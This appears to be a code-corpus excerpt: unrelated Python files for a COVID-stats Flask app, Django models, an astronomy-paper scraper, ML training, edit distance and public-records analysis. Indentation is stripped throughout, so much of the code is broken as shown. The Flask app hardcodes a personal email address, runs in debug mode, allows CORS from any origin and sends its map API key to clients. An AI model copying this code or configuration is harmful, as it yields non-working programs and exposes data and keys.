app = flask.Flask(__name__)
socketio = flask_socketio.SocketIO(app)
socketio.init_app(app, cors_allowed_origins="*")
dotenv_path = join(dirname(__file__), "sql.env")
load_dotenv(dotenv_path)
dotenv_path = join(dirname(__file__), "api-keys.env")
load_dotenv(dotenv_path)
database_uri = os.environ["DATABASE_URL"]
api_k = os.environ["MAP_API_KEY"]
app.config["SQLALCHEMY_DATABASE_URI"] = database_uri
login = 0
db = flask_sqlalchemy.SQLAlchemy(app)
db.init_app(app)
db.app = app
USERS_UPDATED_CHANNEL = "users updated"
STATISTICS = "stats"
NEWUSER = "new user"
FAQS = "faq lists"
ARTICLE = "article list"
SITE = "site page"
SEARCH = "searching"
import models
def emit_all_users(channel):
"""emits all users"""
all_users = [user.name for user in db.session.query(models.User1).all()]
socketio.emit(channel, {"allUsers": all_users})
return channel
def push_stat_data(state):
"""Calls Covid API"""
information = get_covid_stats_by_state(state)
print(state)
case = information.cases
newCases = information.todaysCases
death = information.deaths
newDeaths = information.todayDeaths
rec = information.recovered
county_list = []
county_confirmed = []
county_deaths = []
county_rec = []
updated = []
print("CASES DEATHS AND RECOVERED: ", case, death, rec)
allcounty = get_covid_stats_by_county(state, "")
for x in allcounty:
county_list.append(x.county)
county_confirmed.append(x.confirmed)
county_deaths.append(x.deaths)
county_rec.append(x.recovered)
updated.append(x.updatedAt)
socketio.emit(
STATISTICS,
{
"state": state,
"cases": case,
"new_cases": newCases,
"deaths": death,
"new_deaths": newDeaths,
"recovered": rec,
"countyNames": county_list,
"countyCases": county_confirmed,
"countyDeaths": county_deaths,
"countyRecovered": county_rec,
"updated": updated,
},
room=request.sid,
)
r = "stats are pushed"
return r
@socketio.on("new google user")
def on_new_google_user(data):
"""new user when log in"""
print("Got an event for new google user input with data:", data)
push_new_user_to_db(data["name"], data["email"], data["pic"], data["room"])
emit_all_users(USERS_UPDATED_CHANNEL)
return USERS_UPDATED_CHANNEL
@socketio.on("email results")
def on_send_results(data):
#This name would be the user but mailgun will not allow emails to be sent to
# unverified users without paying.
name="Madison"
msg = "Hello "+name+"! After taking your questionnaire us here at Covid Catcher recommended the following...\n"
msg += data['results']
print(msg)
print(requests.post(
"https://api.mailgun.net/v3/sandbox65fda9f953cb42baacd1bdd34356b8c4.mailgun.org/messages",
auth=("api", os.environ["MAIL_API_KEY"]),
data={"from": "Excited User <mailgun@sandbox65fda9f953cb42baacd1bdd34356b8c4.mailgun.org>",
#This only sends to madison becuase mailgun for free can only send to verified emails
#To send to the specific users email simply pull the email from the database at this socket
# number and send it there
"to": ["miatkem@gmail.com"],
"subject": "Covid Catcher Questionnaire Results",
"text":msg}).text)
@socketio.on("faq categories")
def on_faq_categories():
"""get all categories for faqs"""
categories = get_all_categories()
socketio.emit("faq category list", categories)
@socketio.on("faq questions")
def on_faq_questions(category):
"""get questions and answers in a category"""
if category == "" or category == None:
faqs = get_all_questions()
else:
faqs = get_all_questions(category)
response = []
for faq in faqs:
response.append(
{
"question": faq.question,
"answer": faq.answer,
}
)
socketio.emit("faq list", response)
def push_new_user_to_db(name, email, picture, room):
"""puts new user in the database"""
global login
all_users = [user.email for user in db.session.query(models.User1).all()]
if email in all_users:
print(email, " is already a user in the database!")
else:
db.session.add(models.User1(name, email, picture, room))
db.session.commit()
login = 1
userLog()
emit_all_users(USERS_UPDATED_CHANNEL)
return name
def get_state_colors():
"""Colors for USA map"""
state_colors = []
state_cases = []
state_active = []
for i in get_covid_stats_for_all_states():
state_colors.append(i.color)
state_cases.append(i.cases)
state_active.append(i.activeCases)
socketio.emit(
"colors", {"colors": state_colors, "cases": state_cases, "active": state_active}
)
def userLog():
"""User Login Check"""
if login == 1:
socketio.emit(NEWUSER, {"login": 1})
return True
@socketio.on("search loc")
def search_loc(data):
"""Search for location covid stats"""
state = data["loc"]
push_stat_data(state)
@socketio.on("connect")
def on_connect():
"""Socket for when user connects"""
articleList()
#test_location()
get_state_colors()
ip = request.environ["HTTP_X_FORWARDED_FOR"]
loc = get_location(ip)
push_stat_data(loc.state)
return True
@socketio.on("search location")
def searching(data):
"""Search location"""
a = data["area"]
areaLoc = search_user(a)
allsites = get_sites(areaLoc[0], areaLoc[1])
title_list = []
address_list = []
lat_list = []
lng_list = []
phone_list = []
web_list = []
miles_list = []
counter = 0
for site in allsites:
if counter != 3:
title_list.append(site.title)
address_list.append(site.entireAddress)
lat_list.append(site.latitude)
lng_list.append(site.longitude)
phone_list.append(site.phone)
web_list.append(site.web)
miles_list.append(site.miles)
counter += 1
else:
break
socketio.emit(
SITE,
{
"user_lat": areaLoc[0],
"user_lng": areaLoc[1],
"title": title_list,
"address": address_list,
"latitude": lat_list,
"longitude": lng_list,
"phone": phone_list,
"web": web_list,
"miles": miles_list,
"key": api_k,
}, room=request.sid
)
return True
'''
def test_location():
"""Get testing locations"""
ip = request.environ["HTTP_X_FORWARDED_FOR"]
loc = get_location(ip)
lat = loc.latitude
lng = loc.longitude
allsites = get_sites(lat, lng)
title_list = []
address_list = []
lat_list = []
lng_list = []
phone_list = []
web_list = []
miles_list = []
counter = 0
for site in allsites:
if counter != 3:
title_list.append(site.title)
address_list.append(site.entireAddress)
lat_list.append(site.latitude)
lng_list.append(site.longitude)
phone_list.append(site.phone)
web_list.append(site.web)
miles_list.append(site.miles)
counter += 1
else:
break
socketio.emit(
SITE,
{
"user_lat": lat,
"user_lng": lng,
"title": title_list,
"address": address_list,
"latitude": lat_list,
"longitude": lng_list,
"phone": phone_list,
"web": web_list,
"miles": miles_list,
"key": api_k,
},
)
return True'''
def articleList():
"""Calls the Article API"""
articles = get_news(
5, since=news.YESTERDAY.strftime("%yyyy-%mm-%dd"), query="covid"
)
title_list = []
desc_list = []
url_list = []
image_list = []
source_list = []
for art in articles:
image_list.append(art.image)
title_list.append(art.title)
source_list.append(art.source)
desc_list.append(art.description)
url_list.append(art.url)
socketio.emit(
ARTICLE,
{
"title": title_list,
"desc": desc_list,
"url": url_list,
"img": image_list,
"sources": source_list,
},
)
return True
@app.route("/")
def index():
"""loads page"""
models.db.create_all()
db.session.commit()
return flask.render_template("index.html")
@app.errorhandler(404)
def page_not_found(e):
"""Handles Page Not Found"""
return flask.render_template("index.html")
if __name__ == "__main__":
socketio.run(
app,
host=os.getenv("IP", "0.0.0.0"),
port=int(os.getenv("PORT", 8080)),
debug=True,
)
|
8,036 | 092242cdb231e09ccf3dd4dccfb6d786c3e4aad2 | from django.db import models
# Create your models here.
class GameGenre(models.Model):
genreName = models.CharField(max_length=100)
genreDescription = models.CharField(max_length=300)
def __str__(self):
return "%s" % (self.genreName)
class Game(models.Model):
gameName = models.CharField(max_length=100)
genre = models.ForeignKey(GameGenre)
def __str__(self):
return "%s, %s" % (self.gameName, self.genre)
class Players(models.Model):
playerName = models.CharField(max_length=100)
games = models.ManyToManyField(Game)
def __str__(self):
return "%s" % (self.playerName)
|
8,037 | 9e314cdf4ef09ecf4a4b43358ae32f76c40aaea8 | import os
import redis
import requests
import lxml.html
ads_api_url = "http://adslabs.org/adsabs/api/search/"
ads_html_url = "http://labs.adsabs.harvard.edu/adsabs/abs/"
rdb = redis.Redis()
def get_dev_key():
# Credit: Andy Casey
ads_dev_key_filename = os.path.abspath(
os.path.expanduser("~/.ads/dev_key"))
if os.path.exists(ads_dev_key_filename):
with open(ads_dev_key_filename, "r") as fp:
dev_key = fp.readline().rstrip()
return dev_key
dev_key = os.environ.get("ADS_DEV_KEY", None)
if dev_key is None:
raise IOError("no ADS API key found in ~/.ads/dev_key")
return dev_key
def get_author_locations(author, return_json=False):
name = sorted([a.strip() for a in author.split(",")], reverse=True,
key=lambda n: len(n))[0].lower()
params = {
"q": "author:{0}".format(author),
"dev_key": get_dev_key(),
"rows": 200,
"filter": "database:astronomy",
"fl": "bibcode,year",
}
response = requests.post(ads_api_url, params=params)
if response.status_code != requests.codes.ok:
response.raise_for_status()
codes = response.json().get("results", {}).get("docs", None)
if codes is None:
return []
results = [(el.get("bibcode"), el.get("year")) for el in codes]
affils = []
for code, year in results:
if year is None:
continue
text = rdb.get("career:{0}".format(code))
if text is None:
url = ads_html_url + code
r = requests.get(url)
if r.status_code != requests.codes.ok:
r.raise_for_status()
text = r.text
rdb.set("career:{0}".format(code), text)
tree = lxml.html.fromstring(text)
for author in tree.find_class("author"):
if name in author.find_class("authorName")[0].text.lower():
a = author.find_class("authorAffiliation")
if len(a):
affils.append((int(year), a[0].text.strip("()").strip()))
break
return affils
if __name__ == "__main__":
print(get_author_locations("foreman-mackey"))
|
8,038 | 92bcfff733e5f305ad1276ceb39a72a8f0fcb214 | import argparse
import tensorboardX as tb
import torch as th
import torch.nn.functional as F
import torch.optim as optim
import torch.utils.data as D
import data
import mlp
import resnet
import utils
parser = argparse.ArgumentParser()
parser.add_argument('--bst', nargs='+', type=int, help='Batch Size for Training')
parser.add_argument('--bsi', type=int, help='Batch Size for Inference')
parser.add_argument('--ds', type=str, help='DataSet')
parser.add_argument('--gpu', type=int, help='GPU')
parser.add_argument('--id', type=str, help='IDentifier')
parser.add_argument('--log-every', type=int, help='LOG statistics EVERY _ iterations')
parser.add_argument('--loss', type=str, help='LOSS')
parser.add_argument('--lr', type=float, help='Learning Rate')
parser.add_argument('--metric', type=str, help='METRIC')
parser.add_argument('--model', type=str, help='MODEL')
parser.add_argument('--ni', type=int, help='Number of Iterations')
parser.add_argument('--opt', type=str, help='OPTimizer')
parser.add_argument('--ptt', nargs='+', type=int, help='ParTiTion')
parser.add_argument('--tb', action='store_true', help='TensorBoard')
parser.add_argument('--w', type=float, help='Weight')
parser.add_argument('--wd', type=float, help='Weight Decay')
args = parser.parse_args()
x, y = {'adult' : data.load_adult,
'cifar10' : data.load_multi_cifar10,
'cifar100' : data.load_multi_cifar100,
'covtype' : data.load_covtype,
'kddcup08' : data.load_kddcup08,
'letter' : data.load_multi_letter,
'mnist' : data.load_multi_mnist}[args.ds]()
x, y = data.shuffle(x, y)
[[train_xx, train_yy],
[val_xx, val_yy],
[test_xx, test_yy]] = data.partition(x, y, args.ptt)
train_x, val_x, test_x = th.cat(train_xx), th.cat(val_xx), th.cat(test_xx)
train_y, val_y, test_y = th.cat(train_yy), th.cat(val_yy), th.cat(test_yy)
train_x, val_x, test_x = data.normalize([train_x, val_x, test_x])
train_xx = th.split(train_x, [len(x) for x in train_xx])
train_datasets = [D.TensorDataset(x) for x in train_xx]
train_loader = D.DataLoader(D.TensorDataset(train_x, train_y), args.bsi)
val_loader = D.DataLoader(D.TensorDataset(val_x, val_y), args.bsi)
test_loader = D.DataLoader(D.TensorDataset(test_x, test_y), args.bsi)
pclass_list = [len(y) / len(train_y) for y in train_yy]
n_classes = len(train_yy)
if len(args.bst) == n_classes:
bs_list = args.bst
elif len(args.bst) == 1:
bs_list = [args.bst[0]] * n_classes
else:
raise RuntimeError()
train_loaders = [utils.cycle(D.DataLoader(ds, bs, shuffle=True)) \
for ds, bs in zip(train_datasets, bs_list)]
if args.model == 'linear':
model = th.nn.Linear(train_x.size(1), n_classes)
elif args.model == 'mlp':
model = mlp.MLP([train_x.size(1), 64, 64, 64, n_classes], th.relu, bn=True)
elif args.model == 'resnet':
model = resnet.ResNet(18, n_classes)[args.model]
else:
raise RuntimeError()
dev = th.device('cpu') if args.gpu < 0 else th.device('cuda:%d' % args.gpu)
model = model.to(dev)
params = list(model.parameters())
kwargs = {'params' : params, 'lr' : args.lr, 'weight_decay' : args.wd}
opt = {'sgd' : optim.SGD(**kwargs),
'adam' : optim.Adam(amsgrad=True, **kwargs)}[args.opt]
metric = getattr(utils, args.metric)
if args.tb:
path = 'tb/%s' % args.id
writer = tb.SummaryWriter(path)
train_writer = tb.SummaryWriter(path + '/a')
val_writer = tb.SummaryWriter(path + '/b')
test_writer = tb.SummaryWriter(path + '/c')
def infer(loader, model):
yy = []
y_barr = []
for x, y in loader:
x, y = x.to(dev), y.to(dev)
y_bar = th.max(model(x), 1)[1]
yy.append(y)
y_barr.append(y_bar)
y = th.cat(yy)
y_bar = th.cat(y_barr)
return y, y_bar
def log(model, i):
mmm = []
for loader in train_loader, val_loader, test_loader:
y, y_bar = infer(loader, model)
a = th.sum(y == y_bar).item() / len(y)
fnfn = utils.fn_mc(y, y_bar, n_classes)
fpfp = utils.fp_mc(y, y_bar, n_classes)
m = metric(pclass_list, fnfn, fpfp)
mmm.append([a, m])
tagg = ['a', args.metric]
placeholder = '0' * (len(str(args.ni)) - len(str(i)))
xx = ['/'.join(['%0.2f' % m for m in mm]) for mm in zip(*mmm)]
x = ' | '.join('%s %s' % (tag, mm) for tag, mm in zip(tagg, xx))
print('[iteration %s%d]%s' % ((placeholder, i, x)))
if args.tb:
for writer, mm in zip([train_writer, val_writer, test_writer], mmm):
for tag, m in zip(tagg, mm):
writer.add_scalar(tag, m, i)
utils.eval(model)
log(model, 0)
for i in range(args.ni):
xx = [next(loader)[0].to(dev) for loader in train_loaders]
x = th.cat(xx)
utils.train(model)
z = F.softmax(model(x), 1)
zz = th.split(z, [len(x) for x in xx])
pneg_list = [1 - th.mean(z[:, i]) for i, z in enumerate(zz)]
fnfn = [p_class * p_neg for p_class, p_neg in zip(pclass_list, pneg_list)]
fpfp = [(1 - p_class) * p_neg for p_class, p_neg in zip(pclass_list, pneg_list)]
if args.w > 0:
loss = sum(args.w * fn + (1 - args.w) * fp for fn, fp in zip(fnfn, fpfp))
else:
loss = -metric(pclass_list, fnfn, fpfp)
opt.zero_grad()
loss.backward()
opt.step()
utils.eval(model)
if (i + 1) % args.log_every == 0:
log(model, i + 1)
|
8,039 | 88390f411af90d494284617ef8f5fb0e9bb8890e | def memo(fn):
cache = {}
missed = object()
def query(*args):
result = cache.get(args, missed)
if result is missed:
result = cache[args] = fn(*args)
return result
return query
@memo
def cal_edit_distance(ori, tar):
def edit_tuple(old, distance, path):
return old[0] + distance, old[1] + "\n" + path
if not ori:
return len(tar), "add %s" % tar
if not tar:
return len(ori), "remove %s" % ori
ori_head, ori_rest, tar_head, tar_rest = ori[0], ori[1:], tar[0], tar[1:]
edit_op_dis = cal_edit_distance(ori_rest, tar_rest)
if ori_head != tar_head:
edit_op_dis = edit_tuple(edit_op_dis, 1, "replace %s with %s" % (ori_head, tar_head))
del_op_dis = cal_edit_distance(ori_rest, tar)
del_op_dis = edit_tuple(del_op_dis, 1, "delete %s" % ori_head)
add_op_dis = cal_edit_distance(ori, tar_rest)
add_op_dis = edit_tuple(add_op_dis, 1, "add %s" % tar_head)
return min(edit_op_dis, del_op_dis, add_op_dis, key=lambda e: e[0])
from collections import defaultdict
def edit_distance_norec(ori, tar):
ed = defaultdict(dict)
ed[0] = {i: i for i in range(len(tar) + 1)}
for i in range(len(ori) + 1):
ed[i][0] = i
for i in range(1, len(ori) + 1):
for j in range(1, len(tar) + 1):
del_op = ed[i - 1][j] + 1
add_op = ed[i][j - 1] + 1
edit_op = ed[i - 1][j - 1] if ori[i - 1] == tar[j - 1] else ed[i - 1][j - 1] + 1
ed[i][j] = min(del_op, add_op, edit_op)
return ed[len(ori)][len(tar)]
if __name__ == '__main__':
print(cal_edit_distance("fang", "renf")[0])
print(edit_distance_norec("fang", "renf"))
|
8,040 | e6efd2de5f92d66f1b734a2173fc8681af3c4cc8 | def myswap(a, b):
temp = a
a = b
b = temp
if a < b:
print(a, b)
else:
print(b, a)
a, b = map(int,input().split())
myswap(a,b) |
8,041 | ba85f3c8a9e40f30076c13487a97567f7bc646dc | import numpy as np
from scipy import stats
a = np.random.normal(25.0, 5.0, 10000)
b = np.random.normal(26.0, 5.0, 10000)
print(stats.ttest_ind(a, b)) # bad change, with a ery low chance of randomness
b = np.random.normal(25.0, 5.0, 10000)
print(stats.ttest_ind(a, b)) # no change, outcome is likely random
|
8,042 | 2ec8b9a92f8dd42faf99f0cd569ebf356e12c1d6 | '''It can be seen that the number, 125874, and its double, 251748, contain
exactly the same digits, but in a different order.
Find the smallest positive integer, x, such that 2x, 3x, 4x, 5x, and 6x, contain
the same digits.
'''
import common
import itertools
def digits(x):
return set(int(d) for d in str(x))
common.assertEquals(digits(125874), digits(251748))
def same_digits_as_multiples(x, multiples):
d = digits(x)
# duplicate digits are implicitly forbidden
if len(d) != len(str(x)): return False
for i in multiples:
if d != digits(i*x):
return False
return True
common.assertEquals(True, same_digits_as_multiples(125874, [2]))
common.assertEquals(False, same_digits_as_multiples(123456, [2]))
def euler052():
multiples = range(2,7)
for i in itertools.count(10**5): # solution must have at least 6 digits
if same_digits_as_multiples(i, multiples):
return i
common.submit(euler052(), expected=142857) |
8,043 | b3758e42b52bb50d806832c6a3a76ae0537266de | '''harvestPRR: analyze Public Record Requests from CSV data provided by NextRequest
Created 27 Aug 20
@author: rik@electronicArtifacts.com
'''
from collections import defaultdict
import csv
import datetime
import json
import random
import re
import requests
import sys
import time
import urllib
import re
PRRDateFmt = '%Y-%m-%dT%H:%M:%S'
PRRDateMicroSecFmt = '%Y-%m-%dT%H:%M:%S.%f'
DateTypes = {'date_received': 'recdDate',
'date_created': 'createDate',
'status_updated': 'statusUpDate'}
def freqHist3(tbl):
'''python3 version
ASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order
'''
from functools import cmp_to_key
def cmpd1(a,b):
"decreasing order of frequencies"
return b[1] - a[1]
flist = list(tbl.items()) #python3
flist.sort(key=cmp_to_key(cmpd1))
return flist
AllCSVHeader = ['Id', 'Created At', 'Request Text', 'Due Date', 'Point of Contact', 'Request Date',
'Status', 'URL', 'Visibility', 'Closed Date', 'Closure Reasons',
'Departments', 'Format Received', 'Staff Time (hrs:minutes)',
'Staff Time (minutes)', 'Tags', 'Embargo Ends On Date',
'Staff Cost', 'Date First Contact', 'First Contact Event',
'Compliance', 'Anticipated Fulfillment Date', 'Expiration Date',
'Requester City', 'Requester State', 'Requester Zipcode', 'Requester Company']
DeptNorm = {"Admin: Planning, Building & Neighborhood Preserv": "Admin: Building Inspection",
"Budget and Fiscal": "Budget and Revenue - Revenue Division",
"City Attorney Administration Unit": "City Attorney",
"City Auditor Unit": "City Auditor",
"City Clerk Unit": "City Clerk",
"Oakland Police Department": "Police Department",
"Contracts and Compliance": "Contracts Compliance",
"Transportation Services - Administration": "Department of Transportation",
"Fire": "Fire Department",
"Human Resources Management": "Human Resources",
"Information Technology (IT)": "Information Technology",
"Public Works Agency": "Public Works"}
CSVDTFormat = '%m/%d/%Y %H:%M:%S %p'
# 07/01/2020 09:54:53 AM
def bldIndexTblCSV(inf,startDate=None):
'''return prrIDTbl, deptTbl
'''
prrTbl = {}
deptTbl = defaultdict(list) # keep list of all prrIDs
statusTbl = defaultdict(int)
ncloseDate = 0
nolder = 0
nmultDept = 0
deptSepChar = b'\xef\xbf\xbd' # only used in Finance
reader = csv.DictReader(open(inf,encoding = "utf8",errors='replace'))
for i,entry in enumerate(reader):
prr = {}
prrID = entry['Id']
createDateStr = entry['Created At'].strip()
prr['createDate'] = datetime.datetime.strptime(createDateStr,CSVDTFormat) if createDateStr != '' else None
if prr['createDate'] == None or \
(startDate != None and prr['createDate'] < startDate):
nolder += 1
continue
deptStr = entry['Departments'].strip()
# NB: multiple department separated by semi-colon
if deptStr.find(';') == -1:
deptList = [deptStr]
else:
nmultDept += 1
deptList = [dept.strip() for dept in deptStr.split(';')]
deptList2 = []
for dept in deptList:
ndept = DeptNorm[dept] if dept in DeptNorm else dept
if ndept != '':
deptList2.append(ndept)
deptTbl[ndept].append(prrID)
prr['dept'] = deptList2
closeDateStr = entry['Closed Date'].strip()
prr['closeDate'] = datetime.datetime.strptime(closeDateStr,CSVDTFormat) if closeDateStr != '' else None
prr['status'] = entry['Status'].strip()
prr['text'] = entry['Request Text'].strip()
prr['closeReason'] = entry['Closure Reasons'].strip()
prr['URL'] = entry['URL'].strip()
statusTbl[ prr['status'] ] += 1
if prr['closeDate'] != None:
ncloseDate += 1
prrTbl[prrID] = prr
print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % \
(len(prrTbl),len(deptTbl),nmultDept,ncloseDate))
if startDate != None:
print('bldIndexTblCSV: NOld dropped=%d' % (nolder))
# freqList = freqHist3(deptTbl)
# print('Dept,Freq')
# for dept,freq in freqList:
# print('"%s",%d' % (dept,freq))
freqList = freqHist3(statusTbl)
print('Status,Freq')
for status,freq in freqList:
print('"%s",%d' % (status,freq))
return (prrTbl, deptTbl)
def compHistAvg(hist):
'''compute first moment
ASSUME hist: value -> freq
'''
sum = n = 0
for v in hist.keys():
n += hist[v]
sum += v * hist[v]
return n,float(sum) / n
def compMedian(hist):
'''compute MEDIAN value
ASSUME hist: value -> freq
'''
# only singletons thwart the search for half-way point
if len(hist) == 1:
return hist[0]
sum = n = 0
vn = {}
for v in sorted(hist.keys()):
n += hist[v]
sum += v * hist[v]
vn[v] = n
half = float(n/2.)
for v in sorted(hist.keys()):
if vn[v] > half:
return v
def anlyzCreateDates(prrIDTbl,outf):
'''distribution of create dates
'''
dateDist = defaultdict(int)
nmissdate = 0
for prrID,prr in prrIDTbl.items():
# 180204
# for dtype in DateTypes.values():
# if dtype in prr:
# if cdateFnd == None:
# cdateFnd = prr[dtype]
# else:
# if prr[dtype] != cdateFnd:
# cdateFnd = min([cdateFnd,prr[dtype]])
cdateFnd = prr['createDate']
if cdateFnd== None:
nmissdate += 1
continue
mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month)
dateDist[mkey] += 1
print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl),nmissdate))
allMon = list(dateDist.keys())
allMon.sort()
outs = open(outf,'w')
outs.write('Month,Freq\n')
for mkey in allMon:
outs.write('%s,%d\n' % (mkey,dateDist[mkey]))
outs.close()
def normDeptName(dept):
return re.sub('\W','_',dept.upper())
def anlyzClearDates(prrIDTbl,deptTbl,startDate,outdir,minDeptFreq=10):
'''Compute average (over previous 90 days) number of days to respond to request
Number requests open at month start
'''
allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) > minDeptFreq ]
allDept.sort()
nonOPDresp = defaultdict(lambda: defaultdict(int)) # month -> ndays -> freq
nonOPDopen = defaultdict(int) # month -> freq
print('\n# Dept,NOld,NMissRecd,NMissClose')
missCloseDetails = defaultdict(lambda: defaultdict(list)) # dept -> recd -> [prrID]
for dept in allDept:
responseMon = defaultdict(lambda: defaultdict(int)) # month -> ndays -> freq
openReqMon = defaultdict(int) # month -> freq
nmissRecd = 0
nmissClose = 0
nolder = 0
for prrID in deptTbl[dept]:
prr = prrIDTbl[prrID]
# 180228
# recdDateTime = prr['recdDate']
recdDateTime = prr['createDate']
if recdDateTime==None:
nmissRecd += 1
continue
if recdDateTime < startDate:
nolder += 1
continue
try:
recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month)
except Exception as e:
print('huh')
if prr['status'] == 'Closed':
# 180228
# closeDate = prr['statusUpDate']
closeDate = prr['closeDate']
if closeDate==None:
nmissClose += 1
missCloseDetails[dept][recdMonKey].append(prrID)
continue
respDelay = closeDate - recdDateTime
delayDays = respDelay.days
responseMon[recdMonKey][delayDays] += 1
# NB: was 'Oakland Police Deparment' in 180204
if dept != 'Police Department':
nonOPDresp[recdMonKey][delayDays] += 1
else:
openReqMon[recdMonKey] += 1
# NB: was 'Oakland Police Deparment' in 180204
if dept != 'Police Department':
nonOPDopen[recdMonKey] += 1
print('"%s",%d,%d,%d' % (dept,nolder,nmissRecd,nmissClose))
allMonth = list(responseMon.keys())
allMonth.sort()
normDept = normDeptName(dept)
outf = outdir + normDept + '-RT.csv'
outs = open(outf,'w')
outs.write('Month,NClose,NOpen,Avg,Median\n')
for recdMonKey in allMonth:
nreq,avgDelay = compHistAvg(responseMon[recdMonKey])
medianDelay = compMedian(responseMon[recdMonKey])
outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey,nreq,openReqMon[recdMonKey],avgDelay,medianDelay))
outs.close()
# outf = outdir + normDept + '-nopen.csv'
# outs = open(outf,'w')
# outs.write('Month,NOpen\n')
# for recdMonKey in allMonth:
# outs.write('%s,%d\n' % (recdMonKey,openReqMon[recdMonKey]))
# outs.close()
allMonth = list(nonOPDresp.keys())
allMonth.sort()
outf = outdir + 'NonOPD-RT.csv'
outs = open(outf,'w')
outs.write('Month,N,NOPen,Avg,Median\n')
for recdMonKey in allMonth:
nreq,avgDelay = compHistAvg(nonOPDresp[recdMonKey])
medianDelay = compMedian(nonOPDresp[recdMonKey])
outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey,nreq,nonOPDopen[recdMonKey],avgDelay,medianDelay))
outs.close()
# outf = outdir + 'NonOPD-NOpen.csv'
# outs = open(outf,'w')
# outs.write('Month,NOpen\n')
# for recdMonKey in allMonth:
# outs.write('%s,%d\n' % (recdMonKey,nonOPDopen[recdMonKey]))
# outs.close()
outf = outdir + 'missClose.csv'
outs = open(outf,'w')
# missCloseDetails: dept -> recd -> freq
allDateSet = set()
for dept in missCloseDetails.keys():
allDateSet.update(missCloseDetails[dept].keys())
allDates = sorted(list(allDateSet))
hdr = 'Dept'
for date in allDates:
hdr += ',%s' % (date,)
outs.write(hdr+'\n')
for dept in sorted(missCloseDetails.keys()):
line = dept
for date in allDates:
if date in missCloseDetails[dept]:
line += ',%d' % (len(missCloseDetails[dept][date]),)
else:
line += ', '
outs.write(line+'\n')
outs.close()
def rptDeptFreq(prrTbl, deptTbl,startDate,outf):
# freq = defaultdict(int)
outs = open(outf,'w')
outs.write('Dept,Freq\n')
for dept in sorted(deptTbl.keys()):
nrecent = 0
for prrIdx in deptTbl[dept]:
prr = prrTbl[prrIdx]
if prr['createDate'] >= startDate:
nrecent += 1
outs.write('%s,%d\n' % (dept,nrecent))
outs.close()
def rptOpenPRR(prrTbl,outf):
daysOpen = defaultdict(lambda: defaultdict(list)) # ndays -> OPD/non -> [prrID]
runDate = datetime.datetime.today()
for prrID in prrTbl.keys():
prr = prrTbl[prrID]
opdP = 'Police Department' in prr['dept']
if prr['status'] == 'Open' or prr['status'] == 'Overdue' or prr['status'] == 'Due soon':
recdDateTime = prr['createDate']
openPeriod = runDate - recdDateTime
openDays = openPeriod.days
# NB: capture integer dividend
openYears = openDays // 365
if openYears == 0:
dkey = openDays
else:
dkey = 1000 + openYears
daysOpen[opdP][dkey].append(prrID)
outs = open(outf,'w')
outs.write('DaysOpen,NOPD,NOther,PRR-OPD,PRR-non\n')
allNDaySet = set(daysOpen[0].keys()).union(set(daysOpen[0].keys()))
allNDay = sorted(list(allNDaySet))
for nday in allNDay:
if nday > 365:
lbl = '> %d year' % (nday-1000)
else:
lbl = '%d' % nday
opdList = daysOpen[1][nday] if nday in daysOpen[1] else []
nonList = daysOpen[0][nday] if nday in daysOpen[0] else []
outs.write('%s,%d,%d,"%s","%s"\n' % (lbl,len(opdList),len(nonList), opdList,nonList))
outs.close()
def getWebPages(prrTbl,outf):
outs = open(outf,'w')
outs.write('PRRID,OPD,Text\n')
nempty = 0
npdf = 0
for i,prrID in enumerate(sorted(prrTbl.keys())):
prr = prrTbl[prrID]
if prr['URL'] == '':
nempty += 1
continue
opdP = 'Police Department' in prr['dept']
url = prr['URL']
response = urllib.request.urlopen(url)
webContentBytes = response.read()
webContent = webContentBytes.decode("utf-8")
if webContent.find('pdf') != -1:
print('here')
npdf += 1
else:
continue
if i % 100 == 0:
print(i,npdf,nempty)
# outs.write('%s,%d,"%s"\n' % (prrID,opdP,prr['text']))
outs.close()
print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl),nempty))
def loadPRRQuery(inf):
reader = csv.DictReader(open(inf))
prrIDList = []
for i,entry in enumerate(reader):
# Exhibit,PRRId
prrIDList.append(entry['PRRId'].strip())
return prrIDList
def rptQry(qryList,outf):
outs = open(outf,'w')
outs.write('PRID,CreateDate,DaysOpen,Status\n')
runDate = datetime.datetime.today()
for prrID in qryList:
prr = prr20Recent[prrID]
recdDateTime = prr['createDate']
openPeriod = runDate - recdDateTime
openDays = openPeriod.days
outs.write('%s,%s,%d,%s\n' % (prrID,prr['createDate'].date(),openDays,prr['status']))
outs.close()
if __name__ == '__main__':
dataDir = '/Users/rik/Data/c4a-Data/OAK_data/recordTrac/'
startDate = datetime.datetime(2017,1,1)
csvFile = dataDir + 'requests-2020-07-01-sdoran.csv'
# prr20, deptTbl = bldIndexTblCSV(csvFile)
prr20Recent, deptTbl = bldIndexTblCSV(csvFile,startDate)
openPRRFile = dataDir + 'openPRR_200831.csv'
rptOpenPRR(prr20Recent,openPRRFile)
deptFreqFile = dataDir + 'deptFreq2.csv'
rptDeptFreq(prr20Recent, deptTbl,startDate,deptFreqFile)
createDateFile = dataDir + 'createDate_200831.csv'
anlyzCreateDates(prr20Recent,createDateFile)
clearDateDir = dataDir + 'deptClear_200831/'
anlyzClearDates(prr20Recent,deptTbl,startDate,clearDateDir)
openOPDFile = dataDir + 'openOPD_200831.csv'
rptOpenPRR(prr20Recent,openOPDFile)
|
8,044 | 63bd8a15dd489844968f46c4b0ffe157d567537a |
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import pwd
import sys
from string import ascii_letters, digits
from ConfigParser import SafeConfigParser
# copied from utils, avoid circular reference fun :)
def mk_boolean(value):
if value is None:
return False
val = str(value)
if val.lower() in [ "true", "t", "y", "1", "yes" ]:
return True
else:
return False
def get_config(p, section, key, env_var, default, boolean=False, integer=False, floating=False, islist=False):
''' return a configuration variable with casting '''
value = _get_config(p, section, key, env_var, default)
if boolean:
return mk_boolean(value)
if value and integer:
return int(value)
if value and floating:
return float(value)
if value and islist:
return [x.strip() for x in value.split(',')]
return value
def _get_config(p, section, key, env_var, default):
''' helper function for get_config '''
if env_var is not None:
value = os.environ.get(env_var, None)
if value is not None:
return value
if p is not None:
try:
return p.get(section, key, raw=True)
except:
return default
